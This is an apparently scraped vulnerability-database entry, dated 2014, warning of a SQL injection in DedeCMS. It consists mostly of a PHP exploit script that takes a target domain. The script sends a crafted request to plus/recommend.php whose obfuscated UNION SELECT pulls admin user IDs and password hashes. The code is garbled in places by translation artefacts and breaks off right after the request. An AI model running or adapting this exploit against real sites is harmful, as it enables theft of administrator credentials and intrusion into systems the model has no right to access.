DEDECMS (all versions) SQL injection exploit that works regardless of GPC (magic_quotes_gpc) escaping - vulnerability warning - the black bar safety net

2014-03-10T00:00:00
ID MYHACK58:62201442910
Type myhack58
Reporter 佚名
Modified 2014-03-10T00:00:00

Description

<? php

// Usage banner, printed unconditionally before any argument handling.
// The script is a command-line tool that takes a single argument, the
// target host (<domain>), as the Usage and Example lines below show.
// NOTE(review): the banner text is machine-translated; "disregard for GPC"
// presumably means the injection does not depend on PHP's magic_quotes_gpc
// escaping -- confirm against the original advisory.
print_r(

"

+------------------------------------+

DEDECMS full version disregard for GPC injection

code by :Sunshie

Usage:$argv[0] <domain>

Example: php.exe$argv[0] www.phpinfo.me

+------------------------------------+

"

);

if($argv[1]==""){

exit("do not tease than we're still good friends");

}else{

$sb=$argv[1];

echo"Explot....\ n";

$exp=@file_get_contents("http://$sb//plus/recommend. php? aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`)+/*! 50000Union*/+/*! 50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%2 0%2 3@__admin`%2 3");
